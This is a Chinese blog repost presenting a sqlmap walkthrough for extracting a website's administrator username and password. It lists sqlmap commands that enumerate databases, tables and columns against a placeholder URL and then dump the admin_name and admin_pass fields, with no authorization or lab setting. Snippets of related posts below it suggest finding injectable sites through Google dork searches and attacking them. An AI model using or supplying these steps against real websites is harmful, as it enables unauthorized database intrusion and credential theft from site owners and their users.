获取字段_技术干货 | 利用sqlmap 获取管理员账号密码

最新推荐文章于 2023-10-16 15:32:43 发布
最新推荐文章于 2023-10-16 15:32:43 发布
阅读量298 收藏 2
点赞数
文章标签: 获取字段
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39606911/article/details/111705754
版权
本文介绍了sqlmap这款开源渗透测试工具,用于检测和利用SQL注入漏洞。它支持多种数据库,并涵盖五种注入模式。通过示例展示了如何使用sqlmap获取数据库名、表名、字段名及内容,包括--dbs获取数据库名,--tables获取表名,--columns获取字段名,--dump获取字段内容的实战步骤。
摘要由CSDN通过智能技术生成

b0b05789aa51221c615bb838fa6cf9c4.gif


首先,先简单介绍下sqlmap简介:

sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。

支持的数据库:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。

sqlmap支持五种不同的注入模式:UNION query SQL injection(可联合查询注入
Error-based SQL injection(报错型注入)
Boolean-based blind SQL injection(布尔型注入)
Time-based blind SQL injection(基于时间延迟注入)
Stacked queries SQL injection(可多语句查询注入)基本用法:-u 使用sqlmap
--dbs 获取数据库名
--tables 获取表名
--columns 获取字段名

--dump 获取字段内容实战:1.获取库名  
python2 sqlmap.py -u "http://xxx.com" --dbs

5aa91d51eef47a2e064745de7e7daf36.png

成功获取库名

193c4fe3c9b767995d387f366bd51909.png 

接下来得根据经验,猜他的账户,密码 在哪个库里,或者都进去看看也可以。
2.继续获取表名

python2 sqlmap.py -u "http://xxx.com" -D 库名 --tables

 d81ecfb61c14294fce918d15177cae21.png 

看见admin 看来离目标 不远了

3.获取字段名

python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin --columns

 4b7e8aa2d58382071b8d1ac96e6c8f35.png 

看到admin_name admin _pass  果然就在这
4.获取用户名,密码
python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin -C admin_name,admin_pass --dump

 6563c10acf2053e2e1ed1beedf05c8ac.png 

本文转自:黑白之道

607cd98ed271ab4390836653b82b958d.png

266376f9b88f9799786cf6a4fb4444ee.png

25e95a4523989dbd7ef0375c8e5b0ec5.png

weixin_39606911
关注
[网络安全自学篇] 五十六.i春秋老师分享小白渗透之路及Web渗透技术总结
杨秀璋的专栏
03-05 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文讲解了Windows漏洞利用知识和DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,并编写漏洞利用脚本并实现自动化攻击。本文将分析i春秋YOU老师的小白渗透之路,并结合作者系列文章总结Web渗透技术点,非常适合初学者学习,希望对您有所帮助~
SQL注入-整型注入实例
OneOneZzzzzz
09-19 1150
发现存在SQL注入的站点有很多都是PHP,估计是PHP的占有率太大了,而且建站方便效率高,这就和ios和安卓一样,始终认为安卓安全性差,win和linux,mac一样,始终认为win的安全性差,毕竟占有率摆在这里 通过谷歌来搜索一些存在注入漏洞的网站,用谷歌hack语法来搜索:公司inurl:".php?id=" 结尾为公司,url中带有.php?id=的网页 那么我们来搜索下,我们就选择第一个 先加一个’测试一下,网页直接报错,从报错信息来看,是一个linux服务器,mysql的数据库 使用
[Kali系列]通过SQLMAP获取管理员密码
weixin_45919207的博客
08-29 2560
[Kali系列第二章]通过SQLMAP获取管理员密码准备靶场地址开启SQLMAP开始攻击KALI系列传送门 准备 靶场地址 http://shop.aqlab.cn:8001/single.php?id=1 开启SQLMAP sqlmap 开始攻击 进入KALI,打开终端,输入 sqlmat -u "http://shop.aqlab.cn:8001/single.php?id=1" 你会看到一个选择,直接回车 然后出现这个 在按回车 然后又一次出现选项 按回车 然后输入 sqlmat -u "
sqlmap 获取mysql密码_利用sqlmap 获取管理员账号密码
weixin_36400512的博客
02-06 2799
首先,先简单介绍下sqlmap简介:sqlmap是一种开源的支持的数据库:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。sqlmap支持五种不同的注入模式:UNION query SQL injection(可联合查询...
sqlmap攻击学校靶机获取管理员密码
rang的博客
09-10 836
sqlmap攻击学校靶机获取管理员密码 1.尝试寻找注入注入点可能出现在网站和数据库交互的地方 用and 1=1 发现正常 用 and 1=2 报错 此处可能存在注入点 2.使用sqlmap自动检测是否存在注入sqlmap.py -u "注入地址" 存在注入点 3、获取数据库 sqlmap.py -u "注入地址" --dbs 其中mysql自带四个默认数据库 information_schema performance_schema mysql test 4.获取数据表(r
SQLMAP获取后台账号密码
weixin_45983744的博客
01-16 5647
QQ交流学习群:811401950 一. SQLmap SQLMap是一个自动化注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过插件。支持的数据库Mysql、Oracle、SQL Server等众多数据库。 二. 常见注入类型 ü 布尔类型盲注,即可以根据返回页面判断条件真假的注入 ü 基于时间的盲注,即不能根据返回页面的内容判断任何信息,要用条件语句查看时间的延...
sqlmap基本用法
Oavinci的博客
06-19 555
最近处于查缺补漏阶段,再重温一遍sqlmap… 写的都是sqlmap最最最基本用法记录(虽然现在能用sqlmap做的题不多了… 我这里对sqli-labs-master第一关进行测试(文字是Windows跑sqlmap命令,图片演示使用的是kali自带的sqlmap) 1、检测注入使用-u参数进行设置注入点URL,如果要指定注入的参数,可以使用-p,这里只有一个注入点也可不...
史上最全网络安全面试题总结
热门推荐
03-17 2万+
新的一年,难免有不少小伙伴面临跳槽或者找工作,本文总结了常见的安全岗位面试题,方便各位复习。祝各位事业顺利,财运亨通。 php爆绝对路径方法? 单引号引起数据库报错 访问错误参数或错误路径 探针类文件如phpinfo 扫描开发未删除的测试文件 google hacking phpmyadmin报路径:/phpmyadmin/libraries/lect_lang.lib.php 利用漏洞读取配置文件找路径 恶意使用网站功能,如本地图片读取功能读取不存在图片,上传点上传不能正常导入的文件 你常用的渗
网络安全之路:我的系统性渗透测试学习框架
03-19 1647
没有兴趣,何来成就,难道就只是为了咕噜猫?hahaha(听不懂吧,没关系,只是因为加密了,你能从我的笔记中找到答案么嘿嘿嘿嘿!!!) 注意:以下内容仅记录本人当时学习时任然不知的相关知识。笔记草率,可能有错,仅供参考。我会慢慢完善的哦! 写在前面: 1.业界比较好的信息安全网站: freebuff:这个看来你已经找到了 secWiKi:ennnnn 安全客:收集了各大SRC哦,如果你哪一天灵感大发发现一个漏洞或者业务逻辑Bug,赶快去提交吧,也可以去补天,漏洞盒子提交哦!还有众测平台哈哈哈。还有
实验二:网络嗅探与身份认证
yghlqgt的博客
11-26 440
文章目录实验目的实验步骤和内容网络嗅探概念1、网络嗅探概述2、ARP欺骗3、密码(口令,Password)安全网络嗅探部分Wireshark抓包ARP欺骗Wireshark分析文件MD5破解John the Ripper的作用总结 实验目的 1、通过使用Wireshark软件掌握Sniffer(嗅探器)工具的使用方法,实现捕捉HTTP等协议的数据包,以理解TCP/IP协议中多种协议的数据结构、通过实验了解HTTP等协议明文传输的特性。 2、研究交换环境下的网络嗅探实现及防范方法,研究并利用ARP协议的安全漏
sqlmap基础使用
最新发布
qq_59607911的博客
10-16 151
确定网站存在注入后,用于查询当前用户下的所有数据库。如果当前用户有权限读取包含所有数据库列表信息的表,使用该命令就可以列出所有相关数据库。如果不加入-D来指定某一个数据库,那么会列出数据库中的所有的表。列出数据库所有用户,如果当前用户有权限读取包含所有用户的表的权限时,使用该命令就可以列出所有管理用户。如果当前用户有读取包含用户密码的权限,sqlmap会先例举出用户,然后列出hash,并尝试破解。查询完表名后,查询该表中的字段名,在后续的注入中,—columns缩写成-C。3、查询当前用户下的所有数据库。
sqlmap注入后,获取到的数据库、表很多,如何快速找到账号和密码的位置
看不尽的尘埃——博客
02-07 7345
-D 数据库–-search -C admin,password  
sqlmap+nikto进行渗透测试获取管理员账号密码操作实例
WEL测试
10-18 8915
首先,在百度搜索输入框输入:inurl:asp?id=,在搜索列表中选择连接类似如下的url:http://域名/about.asp?id=325。 其次,打开BT5,打开sqlmap,执行如下格式命令:./sqlmap.py -u "http://域名/about.asp?id=325" --dbs --current-user,执行命令如下截图: 该命令是获取web服务操作系统、w
sqlmap,扫描网站数据库并得到用户名及密码!
专注前端技术,包括Web端、移动端、小程序、APP
02-04 9980
接着上篇文章,你已经对sqlmap有了了解。那么我们今天就进一步了解sqlmap使用sqlmap对一个网站解剖分析! SqlMap的程序允许检查网站的SQL注入漏洞,XSS漏洞的存在,并且可以还利用SQL注入。支持多种SQL注入类型和多种数据库。 我们可以使用sqlmap检查网站中是否存在漏洞。 如果该站点容易受到SQL注入的攻击,则骇客可以进行以下攻击: 从数据库接收信息,包括转储(整个)数...
sqlmap 进行sql漏洞注入
iptracker的博客
02-19 1万+
有一款工具叫sqlmap主要用于识别sql漏洞并注入,这里我就写一篇教程教大家如何使用。 因为sql注入是非法的,所以我就使用两台自己的虚拟机进行测试,请大家不要在别人的网站上搞破坏。(现在大部分网站已经没有sql漏洞了,修复方法也很简单) 一、什么是sql漏洞 要搞清楚sql漏洞,首先要搞清楚sql语句。sql全程Structured Query Language,是一种编程语言,主要应用于数据...
如何在Kali Linux下使用sqlmap攻击服务器数据库的内容 获取用户名和密码 登陆它的服务器
追风筝的孩子
08-01 2万+
        题外话:这里添加一个通过域名获取IP的命令                   Sqlmap是一款开源的命令行自动SQL注入工具。它能够对多种主流数据库进行扫描支持,基于Python环境。它主要用于自动化地侦测和实施SQL注入攻击以及渗透数据库服务器。SQLMAP配有强大的侦测引擎,适用于高级渗透测试用户,不仅可以获得不同数据库的指纹信息,还可以从数据库中提取数据,此外还能够处...
php后台密码 忘记,ZenCart忘记后台密码找回密码
weixin_39730587的博客
03-22 526
由于经常倒腾站zencart后台密码总是搞乱或者忘记,下面是我自己经常用的一些改回密码的方法。第一种情况,如果是网站在服务器上面,可以通过后台输入管理员的邮箱,用邮箱找回密码,这种找回密码的前提是你的网站后台 和服务器的邮箱参数设置要正确,否则就有可能收不到邮件,这样密码也就无法取回。当然,如果都正确的话当然是可以取回密码的。第 二种情况,zencart后台密码忘记了,被人改了。可以这样操作:安装...
获取网站管理员账户密码?
Mike_Roger的博客
01-24 2万+
最近学长让用sqlmap获取一个网站的管理员账户和密码,一开始就很迷茫啊,毕竟对这些东西不是太了解,,可能是我懂得太少,,后来完成之后才发现是一件很简单的事,毕竟,学长给的是一个容易攻破的网站,,也不算是攻破,总之就是入门嘛。   SQL注入:就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。   首先sqlmap据说是一个开源的
用websploit获取管理员后台地址
Anton8801的博客
05-30 1378
1, use web/pma 2, set TARGET http://www.****.com 3, run
sqlmap获取数据库账号密码
09-19
4. 获取账号密码:在确认漏洞可利用后,sqlmap 将根据所选的注入技术,尝试提取数据库的账号和密码信息。它可以通过读取数据库的配置文件、绕过验证或爆破等方式获取凭据。 需要注意的是,sqlmap使用必须遵守...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值